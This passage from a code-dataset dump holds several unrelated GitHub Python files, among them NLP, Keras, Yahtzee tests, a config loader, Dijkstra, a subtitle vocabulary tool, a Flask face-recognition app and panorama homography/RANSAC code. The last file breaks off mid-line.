Из этой части будет извлекаться характеристика персонажей\n    # borderLeft = max(0, i[0] - 200)\n    # while text[borderLeft] != ' ' and borderLeft < len(text) - 2:\n    #     borderLeft+=1\n    # borderRight = min(i[1] + 200, len(text) - 1)\n    # while text[borderRight] != ' ' and borderRight > 0:\n    #     borderRight -= 1\n    # # subText = word_tokenize(text[borderLeft + 1:borderRight])\n    # # subText = [i for i in subText if (i not in string.punctuation)]\n    # # stop_words = stopwords.words('russian')\n    # # stop_words.extend(['что', 'это', 'так', 'вот', 'быть', 'как', 'в', 'во', 'уж', '—', 'к', 'на', 'ко'])\n    # # subText = [i for i in subText if (i not in stop_words)]\n    # # characteristic = []\n    # # for j in subText:\n    # #     p = morph.parse(j)\n    # #     pos = p[0].tag.POS\n    # #     # Характеристика строится на основе прилагательных\n    # #     if (pos == \"ADJF\" or pos == \"ADJS\"):\n    # #         characteristic.append(j)\n    # # print(arr[was_names[_]][\"characteristic\"])\n    # arr[was_names[_]][\"characteristic\"].append(text[borderLeft + 1:borderRight])\n    # # -------------------------------------------------------------------------------------------------------------------\n    was_names = []\n\n\n# jsonDict = json.dumps(arr)\nprint(arr)\nwith open(\"fileJson1.json\", \"w\", encoding=\"utf-8\") as file:\n    json.dump(arr, file, ensure_ascii=False)\nprint(\"ok \")\n\n# print(nothing1)\n# print(nothing2)\n# print(nothing3)\n# #\n# # pprint(arr)\n# for i in arr:\n#     print(i)\n#     for j in arr[i][\"names\"]:\n#         print(\"\\t\", j)\n#\n#\n#\n","repo_name":"Annstasia/ComplingTrueProject","sub_path":"third.py","file_name":"third.py","file_ext":"py","file_size_in_byte":8534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"9106293215","text":"y_predicted = model.predict_classes(X_test, verbose=0)\n\n# Let's display the first inputs image, the predicted labels and the true labels\nplt.figure(figsize=(12, 9))\nfor i in range(15):\n    plt.subplot(3, 5, i + 1)\n    plt.imshow(scaler.inverse_transform(X_test[i]).reshape(8, 8),\n               cmap=plt.cm.gray_r, interpolation='nearest')\n    plt.title(\"predicted label: %d\\n true label: %d\"\n              % (y_predicted[i], y_test[i]))\n    \nprint(\"test acc: %0.4f\" % np.mean(y_predicted == y_test))","repo_name":"timothyyu/ml_monorepo","sub_path":"lectures-labs/labs/01_keras/solutions/keras_accuracy_on_test_set.py","file_name":"keras_accuracy_on_test_set.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"}
{"seq_id":"2105923301","text":"import unittest\n\nfrom project_files.yahtzee_game.yahtzee_exceptions import ScoreTypeNotAvailableException, InvalidScoreException\nfrom project_files.yahtzee_game.yahtzee_scorecard import Scorecard\n\n\n\n\nclass TestYahtzeeScorecard(unittest.TestCase):\n\n    def setup_method(self, method):\n        self.scorecard = Scorecard(player_name=\"nobody should see this\")\n        self.all_score_types = ['yahtzee',\n                                'chance',\n                                'ones',\n                                'twos',\n                                'threes',\n                                'fours',\n                                'fives',\n                                'sixes',\n                                'pair',\n                                'two_pairs',\n                                'triples',\n                                'quadruples',\n                                'small_straight',\n                                'large_straight',\n                                'full_house']\n\n    def test_initial_total_score(self):\n        self.assertEqual(self.scorecard.get_total_score(), 0)\n\n    def test_taking_turn_updates_total_score(self):\n        self.scorecard.score_a_turn(turn_score=5, score_type='ones')\n        self.assertEqual(self.scorecard.get_total_score(), 5)\n\n    def test_score_sums_multiple_turns(self):\n        self.scorecard.score_a_turn(turn_score=5, score_type='ones')\n        
self.scorecard.score_a_turn(turn_score=13, score_type='fives')\n self.assertEqual(self.scorecard.get_total_score(), 18)\n\n def test_all_score_types_initially_available(self):\n available_score_types = self.scorecard.get_available_score_types()\n self.assertListEqual(available_score_types, self.all_score_types)\n\n def test_scoring_a_turn_removes_the_score_type_from_the_available_score_types(self):\n expected_score_types = self.all_score_types\n expected_score_types.remove('triples')\n\n self.scorecard.score_a_turn(turn_score=1, score_type='triples')\n available_score_types = self.scorecard.get_available_score_types()\n\n self.assertListEqual(available_score_types, expected_score_types)\n\n def test_throws_exception_when_score_type_is_not_available(self):\n try:\n self.scorecard.score_a_turn(turn_score=5, score_type='ones')\n self.scorecard.score_a_turn(turn_score=5, score_type='ones')\n self.fail(\"expecting an exception\")\n except ScoreTypeNotAvailableException as exception:\n self.assertEqual(exception.message, \"This score type is not currently available to you.\")\n\n def test_bad_score_values_give_exception(self):\n try:\n self.scorecard.score_a_turn(turn_score=\"hi im the best score\", score_type='ones')\n self.fail(\"expecting an exception\")\n except InvalidScoreException as exception:\n self.assertEqual(exception.message, \"Score must be a non-negative integer.\")\n\n def test_raises_exception_with_negative_score(self):\n try:\n self.scorecard.score_a_turn(turn_score=-1, score_type='ones')\n self.fail(\"expecting an exception\")\n except InvalidScoreException as exception:\n self.assertEqual(exception.message, \"Score must be a non-negative integer.\")\n\n def test_equals(self):\n scorecard1 = Scorecard(\"player\")\n scorecard2 = Scorecard(\"player\")\n self.assertEquals(scorecard1, scorecard2)\n\n scorecard1.player_name = \"player1\"\n self.assertNotEqual(scorecard1, scorecard2)\n\n scorecard1.player_name = \"player\"\n scorecard1.total_score = -1\n self.assertNotEqual(scorecard1, scorecard2)\n\n scorecard1.total_score = 0\n scorecard1.available_score_types.append(\"extra type\")\n self.assertNotEqual(scorecard1, scorecard2)\n\n scorecard2.available_score_types.append(\"different extra type\")\n self.assertNotEqual(scorecard1, scorecard2)\n","repo_name":"kiaraa/tdd_practice","sub_path":"test_files/yahtzee_scorecard_test.py","file_name":"yahtzee_scorecard_test.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23816192553","text":"import os\nimport json\nimport logging\n\nclass JsonConfig: # pragma: no cover\n \"\"\"Allow to override settings by external configuration.\"\"\"\n\n def __init__(self, config):\n \"\"\"Initialize config with dictionary.\"\"\"\n self._config = config\n self.logging = logging.getLogger(\"Settings\")\n self.logging.propagate = False\n level = logging.INFO\n if \"DEBUG\" in os.environ and (\n os.environ[\"DEBUG\"] or\n os.environ[\"DEBUG\"].lower() in (\"true\", \"t\", \"yes\", \"y\")):\n level = logging.DEBUG\n self.logging.setLevel(level)\n handler = logging.StreamHandler()\n handler.setLevel(level)\n handler.setFormatter(logging.Formatter(\"%(asctime)s [Settings] %(message)s\"))\n self.logging.addHandler(handler)\n self.logging.debug(\"Running in debug mode.\")\n\n @classmethod\n def read(cls, envvar=\"CONFIG_FILE\", filename=\"config.json\"):\n \"\"\"Read a JSON configuration file and create a new configuration.\"\"\"\n filename = 
os.environ.get(envvar, filename)\n directory = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n filename = directory + \"/\" + filename\n try:\n with open(filename, \"r\") as config_file:\n config = json.loads(config_file.read())\n except FileNotFoundError:\n config = {}\n\n return cls(config)\n\n def get(self, key, default=None):\n \"\"\"Retrieve settings value for a given key.\"\"\"\n value = os.environ.get(key)\n\n if value:\n self.logging.info(\"Got %s from environment.\" % key)\n self.logging.debug(value)\n return_val = value\n elif key in self._config.keys():\n self.logging.info(\"Got %s from config file.\" % key)\n self.logging.debug(value)\n return_val = self._config[key]\n else:\n return_val = default\n return return_val\n\n def get_bool(self, key, default):\n \"\"\"Retrieve boolean settings value.\"\"\"\n value = self.get(key, default)\n if isinstance(value, bool):\n return value\n return value.lower() in (\"true\", \"t\", \"yes\", \"y\")\n\n\nCONFIG = JsonConfig.read()\n\n# Config keys\n\nAPI_KEY = CONFIG.get(\"API_KEY\", None)\nLIMIT_SHARE = int(CONFIG.get(\"LIMIT_SHARE\", 100)) / 100\nDEBUG = CONFIG.get_bool(\"DEBUG\", False)\n","repo_name":"DoctressWasTaken/Lightshield_proxy","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18218001182","text":"class Solution:\n def minimumWeight(self, n: int, edges: List[List[int]], src1: int, src2: int, dest: int) -> int:\n graph1 = [[] for _ in range(n)]\n graph2 = [[] for _ in range(n)] # Reversed(graph1)\n\n for u, v, w in edges:\n graph1[u].append((v, w))\n graph2[v].append((u, w))\n\n def dijkstra(graph: List[List[Tuple[int, int]]], src: int) -> List[int]:\n dist = [math.inf] * n\n minHeap = [(0, src)] # (d, u)\n while minHeap:\n d, u = heapq.heappop(minHeap)\n if dist[u] != math.inf:\n continue\n dist[u] = d\n for v, w in graph[u]:\n heapq.heappush(minHeap, (d + w, v))\n return dist\n\n fromSrc1 = dijkstra(graph1, src1)\n fromSrc2 = dijkstra(graph1, src2)\n fromDest = dijkstra(graph2, dest)\n minWeight = min(a + b + c for a, b, c in zip(fromSrc1, fromSrc2, fromDest))\n return -1 if minWeight == math.inf else minWeight\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/2203. 
Minimum Weighted Subgraph With the Required Paths/2203.py","file_name":"2203.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"25738001180","text":"#!/usr/bin/env python3\n\n# srt.py -- extract vocabulary words from srt subtitles with the ability to\n# pull up definitions and grep for the words used in context\n\nimport argparse\nimport collections\nimport os\nimport random\nimport spacy\nimport subprocess\nimport sys\n\nparser = argparse.ArgumentParser(description='subtitle utilities')\nparser.add_argument('filename', type=str, nargs='*', help='input srt files')\nparser.add_argument('--brain', type=str, help='brain file')\nparser.add_argument('--min-count', type=int, help='only show words that occur at least this many times', default=2)\n\nunwanted_pos = set(['SPACE', 'SYM', 'PUNCT', 'PART', 'ADP'])\n\ndef load_srt(filename):\n data = open(filename).read()\n blocks = data.split('\\n\\n')\n lines = []\n for block in blocks:\n lines.append(''.join(block.splitlines()[2:]))\n return lines\n\ndef main():\n args = parser.parse_args()\n brain = args.brain or os.path.expanduser('~/srt.brain')\n try:\n known = set(open(brain).read().splitlines())\n except OSError:\n known = set()\n text = '\\n'.join(sum((load_srt(filename) for filename in args.filename), []))\n nlp = spacy.load('ja_core_news_md')\n doc = nlp(text)\n try:\n all_tokens = []\n for token in doc:\n all_tokens.append(token)\n token_counts = collections.Counter(token.lemma_ for token in all_tokens)\n seen_lemmas = set()\n tokens = []\n for token in all_tokens:\n if token.pos_ in unwanted_pos: continue\n if token.lemma_ in known: continue\n #if token.lemma_ in seen_lemmas: continue\n if token_counts[token.lemma_] < args.min_count: continue\n seen_lemmas.add(token.lemma_)\n tokens.append(token)\n random.shuffle(tokens)\n while tokens:\n token = tokens.pop()\n lemma = token.lemma_\n if lemma not in known:\n print(len(tokens), lemma, token.pos_)\n print('https://jisho.org/search/' + lemma)\n print('https://en.wiktionary.org/wiki/' + lemma)\n while True:\n cmd = input()\n if cmd == 'd':\n os.system(f'define {lemma} -l Japanese')\n elif cmd == 'c':\n output = subprocess.check_output(['grep', '--color=always', '-C1', token.text] + args.filename)\n print(output.decode('utf-8'), end='')\n output = subprocess.check_output(['grep', '--color=never', '-C1', token.text] + args.filename)\n p = subprocess.run(['xclip', '-in', '-selection', 'clipboard'], input=output)\n elif cmd == '':\n break\n else:\n print('?')\n known.add(lemma)\n except KeyboardInterrupt:\n print('ok bye')\n except:\n print('whoa')\n raise\n finally:\n f = open(brain, 'w')\n f.write('\\n'.join(sorted(known)))\n f.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"neynt/dotfiles3","sub_path":"bin/srt.py","file_name":"srt.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17068448603","text":"import os\r\nfrom flask import render_template\r\nfrom flask import Flask, flash, request, redirect, url_for\r\nfrom werkzeug.utils import secure_filename\r\nimport face_recognition\r\nimport os\r\nfrom cv2 import cv2\r\nimport pickle\r\n\r\nUPLOAD_FOLDER = r'Unknown Faces'\r\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\r\n\r\napp = Flask(__name__)\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\n\r\ndef allowed_file(filename):\r\n return '.' 
in filename and \\\r\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef upload_file():\r\n if request.method == 'POST':\r\n\r\n if 'file' not in request.files:\r\n flash('No file part')\r\n return redirect(request.url)\r\n file = request.files['file']\r\n\r\n if file.filename == '':\r\n flash('No selected file')\r\n return redirect(request.url)\r\n if file and allowed_file(file.filename):\r\n filename = secure_filename(file.filename)\r\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\r\n return '''\r\n <!doctype html>\r\n <title>Upload new File</title>\r\n <h1>File Uploaded</h1>\r\n '''\r\n\r\n return '''\r\n <!doctype html>\r\n <title>Upload new File</title>\r\n <h1>Upload new File</h1>\r\n <form method=post enctype=multipart/form-data>\r\n <input type=file name=file>\r\n <input type=submit value=Upload>\r\n </form>
\r\n '''\r\n@app.route('/predict')\r\ndef run_script():\r\n li = []\r\n\r\n KNOWN_FACES_DIR = r'Known Faces'\r\n UNKNOWN_FACES_DIR = r'Unknown Faces'\r\n TOLERANCE = 0.6\r\n FRAME_THICKNESS = 3\r\n FONT_THICKNESS = 2\r\n MODEL = 'cnn' \r\n\r\n def name_to_color(name):\r\n\r\n color = [(ord(c.lower())-97)*8 for c in name[:3]]\r\n return color\r\n\r\n print('Loading known faces...')\r\n known_faces = []\r\n known_names = []\r\n\r\n for name in os.listdir(KNOWN_FACES_DIR):\r\n print(name)\r\n for filename in os.listdir(os.path.join(KNOWN_FACES_DIR, name)):\r\n print(filename)\r\n image = face_recognition.load_image_file(f'{KNOWN_FACES_DIR}\\\\{name}\\\\{filename}')\r\n encoding = face_recognition.face_encodings(image)[0]\r\n known_faces.append(encoding)\r\n known_names.append(name)\r\n print('Processing unknown faces...')\r\n\r\n for filename in os.listdir(UNKNOWN_FACES_DIR):\r\n print(f'Filename {filename}', end='')\r\n image = face_recognition.load_image_file(f'{UNKNOWN_FACES_DIR}\\\\{filename}')\r\n locations = face_recognition.face_locations(image, model=MODEL)\r\n encodings = face_recognition.face_encodings(image, locations)\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n\r\n\r\n print(f', found {len(encodings)} face(s)')\r\n for face_encoding, face_location in zip(encodings, locations):\r\n results = face_recognition.compare_faces(known_faces, face_encoding, TOLERANCE)\r\n match = None\r\n if True in results: \r\n match = known_names[results.index(True)]\r\n print(f'{match} this is a match')\r\n print(f' - {match} from {results}')\r\n li.append(match)\r\n \r\n return render_template('show.html', li = li)\r\n","repo_name":"sharduldalal/APISFLASKML","sub_path":"Image Upload API 2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27294004608","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np\nimport cv2\nimport glob\nimport os\nimport zipfile as zf\nimport pickle\nfrom pathlib import Path\nimport random\nimport math\nimport scipy.ndimage\nimport scipy.io\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport sys \n\n# global variables:\nMIN_MATCH_COUNT = 24 # minimum number of matches required \nMAX_ITER = 5000 # number of iterations in ransac\nNUM_MATCH = 500 # total number of matches that we want to subsample from different locations of the image.\n # For every region in the image analysed, if it contains at least a descriptor, and \n # if the number of descriptors subsampled is fixed to N = 1, there will be 500 matches. \n # Nevertheless, some regions of the image can have no descriptors, so the total number of matches will be reduced. \n # For solving this, we can sample N > 1 descriptors from the regions of the image analysed\n\nthreshold_error = 4 # threshold error for points to be considered inliers, when performing ransac\n\n\n# In[3]:\n\n\ndef match_features(des_src, des_dest, threshold):\n '''\n Implements the Nearest Neighbor Distance Ratio Test (NNDR) - Equation 4.18 in Section 4.1.3 of \n Szeliski - to assign matches between interest points in two images. It also searches for mutual \n matches and applies the NNDR test\n \n A match is between a feature in des_src and a feature in des_dest. 
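(Descriptors are stored as column vectors, L2-normalised and compared by cosine similarity, so the best match is simply the highest dot product.) 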
We can\n represent this match as the index of the feature in des_src and the index\n of the feature in des_dest\n \n :params:\n :des_src: an np array of features for interest points in source image\n :des_dest: an np array of features for interest points in destination image\n \n :returns:\n :matches: an np array of dimension k x 2 where k is the number of matches. The first\n column is an index into des_src and the second column is an index into des_dest\n '''\n \n global MIN_MATCH_COUNT\n\n matches = []\n \n # Re-normalize\n des_dest_normalize = des_dest / np.linalg.norm(des_dest, axis = 0)\n \n des_src_normalize = des_src / np.linalg.norm(des_src, axis = 0)\n \n # cosine similarity (descriptors are L2 normalized) \n matrix_similarity = des_src_normalize.T @ des_dest_normalize\n \n ind_col_matches = np.argmax(matrix_similarity, axis = 1)\n \n matches = np.concatenate((np.arange(0, des_src.shape[1]).reshape(-1,1), ind_col_matches.reshape(-1, 1)), axis = 1)\n final_matches = matches\n \n # FIND GOOD MATCHES:\n # Retrieve top 2 nearest neighbors 1->2.\n index_sorted = np.argsort(-matrix_similarity, axis = 1)[:, 0:2]\n\n matrix_distances = np.sqrt(2 - 2 * matrix_similarity)\n \n mask_good_matches = matrix_distances[list(range(0,matrix_distances.shape[0])), index_sorted[:, 0]] / matrix_distances[list(range(0,matrix_distances.shape[0])), index_sorted[:, 1]] < threshold\n \n if np.any(mask_good_matches):\n good_matches = matches[mask_good_matches, :]\n \n print(\"good matches/matches - %d/%d\" % (good_matches.shape[0],matches.shape[0]))\n \n if good_matches.shape[0] > MIN_MATCH_COUNT:\n final_matches = good_matches\n \n # FIND MUTUAL AND GOOD MATCHES: \n # Retrieve top 2 nearest neighbors 1->2.\n matches_12_top2 = np.argsort(-matrix_similarity, axis = 1)[:, 0:2]\n matches_12 = matches_12_top2[:, 0] # Save first NN and match similarity.\n \n matrix_distances = np.sqrt(2 - 2 * matrix_similarity)\n \n # Compute Lowe's ratio.\n mask1_good_matches = matrix_distances[list(range(0,matrix_distances.shape[0])), matches_12_top2[:, 0]] / matrix_distances[list(range(0,matrix_distances.shape[0])), matches_12_top2[:, 1]] < threshold\n\n # Retrieve top 2 nearest neighbors 1->2.\n matches_21_top2 = np.argsort(-matrix_similarity.T, axis = 1)[:, 0:2]\n matches_21 = matches_21_top2[:, 0] # Save first NN and match similarity.\n \n matrix_distances_T = np.sqrt(2 - 2 * matrix_similarity.T)\n \n # Compute Lowe's ratio.\n mask2_good_matches = matrix_distances_T[list(range(0,matrix_distances_T.shape[0])), matches_21_top2[:, 0]] / matrix_distances_T[list(range(0,matrix_distances_T.shape[0])), matches_21_top2[:, 1]] < threshold\n \n final_mask_good_matches = mask1_good_matches & mask2_good_matches[matches_12]\n \n # Mutual NN + symmetric ratio test.\n ids1 = np.arange(0, matrix_similarity.shape[0])\n \n mask_mutual_matches = (ids1 == matches_21[matches_12]) & final_mask_good_matches\n \n if np.any(mask_mutual_matches):\n mutual_matches = matches[mask_mutual_matches, :]\n \n if mutual_matches.shape[0] > MIN_MATCH_COUNT:\n final_matches = mutual_matches\n \n print(\"mutual and good matches/matches - %d/%d\" % (mutual_matches.shape[0],matches.shape[0]))\n\n return final_matches\n\n\n# In[4]:\n\n\ndef siftMatch(img1, img2, sift_path_ref, sift_path_image, threshold = 0.75, N = 1):\n \n global extract_sift, NUM_MATCH, subsampling\n \n if extract_sift:\n sift = cv2.SIFT_create()\n kp1, des1 = sift.detectAndCompute(img1,None)\n kp2, des2 = sift.detectAndCompute(img2,None)\n \n m =match_features(des1.T,des2.T, threshold)\n 
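# kp.pt holds each keypoint's (x, y) pixel position: m[:, 0] indexes kp1 and m[:, 1] indexes kp2, so the lines below gather the matched coordinate pairs.\n 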
src_pts = np.float32([kp1[i].pt for i in m[:,0]]).reshape(-1,2)\n dst_pts = np.float32([kp2[i].pt for i in m[:,1]]).reshape(-1,2)\n \n else:\n data_ref = scipy.io.loadmat(sift_path_ref)\n dst = data_ref['p'] # (2,N) numpy array, where N is the total number of keypoints\n des_dest = data_ref['d'] # (128,N) numpy array, where N is the total number of keypoints\n \n data_image = scipy.io.loadmat(sift_path_image)\n src = data_image['p'] # (2,N) numpy array, where N is the total number of keypoints\n des_src = data_image['d'] # (128,N) numpy array, where N is the total number of keypoints\n \n if subsampling:\n h, w, _ = img1.shape\n \n h_subsampling = math.floor(h/4) \n \n w_subsampling = math.floor(w * h/(NUM_MATCH*h_subsampling)) \n \n regions_h = range(0, h+1, h_subsampling)\n regions_w = range(0, w+1, w_subsampling)\n \n des_src_subsampling = np.array([], dtype=np.int64).reshape(des_src.shape[0],0)\n src_subsampling = np.array([], dtype=np.int64).reshape(src.shape[0],0)\n \n id_descriptor = np.arange(des_src.shape[1])\n \n for i in range(len(regions_h)-1):\n h_region_min = regions_h[i]\n h_region_max = regions_h[i+1]-1\n \n for j in range(len(regions_w)-1):\n w_region_min = regions_w[j]\n w_region_max = regions_w[j+1]-1\n \n ind_keypoints_region = (src[0,:] > w_region_min) & (src[0,:] < w_region_max) & (src[1,:] > h_region_min) & (src[1,:] < h_region_max)\n \n if np.any(ind_keypoints_region):\n if len(ind_keypoints_region[ind_keypoints_region == True]) < N:\n num_sampling = len(ind_keypoints_region[ind_keypoints_region == True])\n \n else:\n num_sampling = N \n \n ind_d_des = random.sample(list(id_descriptor[ind_keypoints_region]), num_sampling)\n \n des_src_subsampling = np.concatenate((des_src_subsampling, des_src[:, ind_d_des]), axis = 1)\n src_subsampling = np.concatenate((src_subsampling, src[:, ind_d_des]), axis = 1)\n \n des_src = des_src_subsampling\n src = src_subsampling\n \n m =match_features(des_src,des_dest, threshold)\n \n matches_coords = np.concatenate((src[:, m[:,0]], dst[:, m[:, 1]]))\n \n src_pts = matches_coords[0:2, :].T\n dst_pts = matches_coords[2:4, :].T\n \n return src_pts, dst_pts\n\n\n# In[5]:\n\n\ndef FitHomography(selected_matches, N = 4):\n \"\"\" Compute the fitted homography matrix by using N match pairs\n \n [u] [X]\n [v] = H [Y], \n [1] [1]\n being H a 3x3 matrix \n \n This can be arranged in a system Ax = 0, where x is a column vector with \n the parameters of the homography, and A is given by:\n A = [X Y 1 0 0 0 -u.X -u.Y -u]\n [0 0 0 X Y 1 -v.X -v.Y -v]\n\n For N matches, the above matrix is vertically stacked, with 2 rows per match \n \"\"\"\n \n X = selected_matches[:,0]\n Y = selected_matches[:,1]\n u = selected_matches[:,2]\n v = selected_matches[:,3]\n \n A = []\n \n for i in range(N):\n row_1 = np.array([X[i], Y[i], 1, 0, 0, 0, -X[i]*u[i], -Y[i]*u[i], -u[i]])\n row_2 = np.array([0, 0, 0, X[i], Y[i], 1, -X[i]*v[i], -Y[i]*v[i], -v[i]])\n \n A.append(row_1)\n A.append(row_2)\n \n A = np.array(A)\n \n # V = eigvec(A.T @ A), being V.T obtained through Singular Value Decomposition (SVD)\n _, _, vT = np.linalg.svd(A)\n\n # vT is a 9×9 matrix\n # the solution x is the eigenvector corresponding to the smallest eigenvalue, \n # that is, the eigenvector corresponding to the minimum singular value, \n # leading to a row vector of 9 columns. 
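(np.linalg.svd returns the singular values in descending order, so vT[-1, :] is precisely this eigenvector.) 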
Thus, to obtain the calibrated \n # homography H, the final solution is to reshape the obtained vector into a \n # 3x3 matrix \n H = np.reshape(vT[-1,:], (3,3))\n \n # normalized homography, dividing by the element at (3,3)\n H = H/H[2,2]\n \n return H \n\n\n# In[6]:\n\n\ndef get_errors(all_matches, H):\n \"\"\"Compute error or distance between original points and transformed by H. \n Return an array of errors for all points\"\"\"\n \n num_matches = len(all_matches)\n \n X = all_matches[:,0].reshape(-1, 1)\n Y = all_matches[:,1].reshape(-1, 1)\n u = all_matches[:,2].reshape(-1, 1)\n v = all_matches[:,3].reshape(-1, 1)\n \n # all matching points in source image\n all_p1 = np.concatenate((X, Y, np.ones((len(all_matches),1))), axis = 1)\n \n # all matching points in template image\n all_p2 = np.concatenate((u, v), axis = 1)\n \n # Transform every point in p1 to estimate p2\n estimate_p2homogeneous = H @ all_p1.T\n \n estimate_p2euclidean = (estimate_p2homogeneous/(estimate_p2homogeneous[-1]))[0:2]\n \n # Compute error of each matching pair\n errors = np.linalg.norm(all_p2 - estimate_p2euclidean.T, axis = 1) \n \n return errors\n\n\n# In[7]:\n\n\ndef GetHomographyRANSAC(match_coords):\n \n \"\"\"Function that computes linear (2D) Homography Calibration, implementing RANSAC\n for eliminating outliers and align correspondent matches. The main output concerns \n a single transformation H that gets the most inliers in the course of all the \n iterations. \n \n Args:\n match_coords(numpy.ndarray): In dims (#matched pixels, 4).\n\n Returns:\n H(numpy.ndarray): Homography matrix, dims (3, 3).\n \"\"\"\n \n global MAX_ITER, threshold_error\n \n N = 4 # four matches to initialize the homography in each iteration\n \n max_inliers = 0 \n \n # RANSAC procedure \n for itr in range(MAX_ITER): \n # Randomly select 4 matched pairs\n idx_rand_inliers = random.sample(range(match_coords.shape[0]), N)\n \n selected_matches = match_coords[idx_rand_inliers, :]\n \n # compute the homography H by DLT from the N = 4 matched pairs \n H = FitHomography(selected_matches)\n \n # Find inliners \n errors = get_errors(match_coords, H)\n \n idx_inliers = np.where(errors < threshold_error)[0]\n \n num_inliers = len(idx_inliers) \n \n # Analise current solution, and if it contains the maximum number of inliers\n # amongst all homographies until now fitted, save the current inliers for \n # further refinement of the homography in the last step \n \n if num_inliers > max_inliers:\n max_inliers = num_inliers\n best_inliers = match_coords[idx_inliers]\n \n # compute the homography H by DLT from best_inliers \n H = FitHomography(best_inliers, max_inliers)\n \n return H\n\n\n# In[8]:\n\n\ndef compute_H_wrt_reference(H_all, ref_image):\n \"\"\"\n Function that computes new homographies H_map that map every other image *directly* to\n the reference image by composing H matrices in H_all. \n The homography in H_map that is associated with the reference image\n should be the identity matrix, created using eye(3). The homographies in\n H_map for the other images (both before and after the reference image)\n are computed by using already defined matrices in H_map and H_all. 
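For example, with ref_image = 2, H_map['H01'] is simply H_all['H01'], while\n H_map['H21'] is the (normalised) inverse of H_all['H12']. 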
\n\n Args: \n H_all(cell array) \n\n ref_image(int): index of the reference image (the first image has index 1)\n\n\n Returns:\n H_map(cell array): 3x3 homography matrices that map each image into the reference image's\n coordinate system.\n\n \"\"\"\n num_imgs = len(H_all)+1\n \n H_map = {}\n \n key = \"H{}{}\".format(ref_image-1, ref_image-1) \n H_map[key] = np.eye(3)\n \n for i in range(0, ref_image-1): \n key = \"H{}{}\".format(i, ref_image-1) \n H_aux = np.eye(3)\n \n j = i\n \n while j < ref_image - 1:\n key_t = \"H{}{}\".format(j, j+1)\n H_aux = H_all[key_t] @ H_aux\n j += 1 \n \n H_map[key] = H_aux\n \n for i in range(ref_image, num_imgs):\n key = \"H{}{}\".format(i, ref_image-1) # H10\n H_aux = np.eye(3)\n \n j = i - 1 \n \n while j >= ref_image-1:\n key_t = \"H{}{}\".format(j, j+1)\n H_inv = np.linalg.inv(H_all[key_t])\n H_aux = H_inv/H_inv[2,2] @ H_aux\n j -= 1\n \n H_map[key] = H_aux\n \n return H_map \n\n\n# In[9]:\n\n\ndef Check_Homography(H):\n \"\"\"\n Check if homography is reasonable, according to certain criteria:\n - If the determinant of the homography det(H) is very close to 0, H is \n close to singular;\n \n - If the condition number of H (ratio of the first-to-last singular value) is\n infinite, the matrix H is singular, and if it is too large, H is \n ill-conditioned. In non-mathematical terms, an ill-conditioned problem \n is one where, for a small change in the inputs, there is a large \n change in the output, that is, H is very sensitive to changes or errors \n in the input. This means that the correct solution/answer to the \n equation becomes hard to find;\n \n - If det(H) < 0, the homography does not preserve orientation, \n being orientation-reversing. This is not suitable, except if we are \n watching the object in a mirror. Nevertheless, sift/surf descriptors \n are not designed to be mirror invariant, so if that were the case we would \n probably not have good matches. \n \n An exactly singular matrix means that it is not invertible. If the above \n criteria are met, the matrix H is, practically speaking, non-invertible. \n In the context of homographies, it means that points in one 2D image are mapped\n to a less-than-2D subspace in the other image (a line, a point). A \n nearly singular matrix is indicative of a rather extreme warp. \n \"\"\"\n \n #Conditions to ascertain that the resultant homography H is free of \n #singularities. If one of the conditions is satisfied, the homography H from \n #image space to reference image space is not reasonable, according \n #to the defined criteria \n if np.linalg.det(H) < 1 and np.linalg.cond(H[0:2, 0:2]) > 2:\n \n # In the condition number, only the top-left 2x2 matrix is considered, \n # thus omitting the z-dependence of the transformation, which should be \n # irrelevant because we know that z will always be fixed to 1 on the input\n \n H = np.zeros((3,3))\n \n return H\n\n\n# In[10]:\n\n\ndef get_blank_canvas(H_warp, ind_image_warp, image_paths, ref_img):\n \"\"\"\n Function that computes the size of the panorama using forward warping. 
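Since a homography maps the image rectangle to a quadrilateral, it is enough to\n forward-warp the four corner coordinates of each image to bound its footprint. 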
Before warping \n each of the images, the size of the output panorama image is computed and \n initialized from the range of warped image coordinates for each input image.\n \"\"\"\n \n num_imgs = len(H_warp)\n \n # Initialize the limits of the output panorama image\n min_crd_canvas = np.array([np.inf, np.inf])\n max_crd_canvas = np.array([-np.inf, -np.inf])\n \n limits_all = []\n \n # mapping the coordinates of the four corners from each source image using forward warping to determine its coordinates in \n # the output image. \n \n for i in range(num_imgs):\n ind_image = ind_image_warp[i]\n \n image = img.imread(image_paths[ind_image])\n img_h, img_w, _ = image.shape\n \n key = \"H{}{}\".format(ind_image, ref_img-1)\n H = H_warp[key]\n \n # create a matrix with the coordinates (homogeneous) of the four corners \n # of the current image\n corners_img = np.array([[0, 0, 1], [0, img_h,1], [img_w, img_h,1], [img_w, 0,1]])\n \n # Map each of the 4 corner's coordinates into the coordinate system of\n # the reference image\n canvas_crd_corners = H @ corners_img.T\n canvas_crd_corners = (canvas_crd_corners / 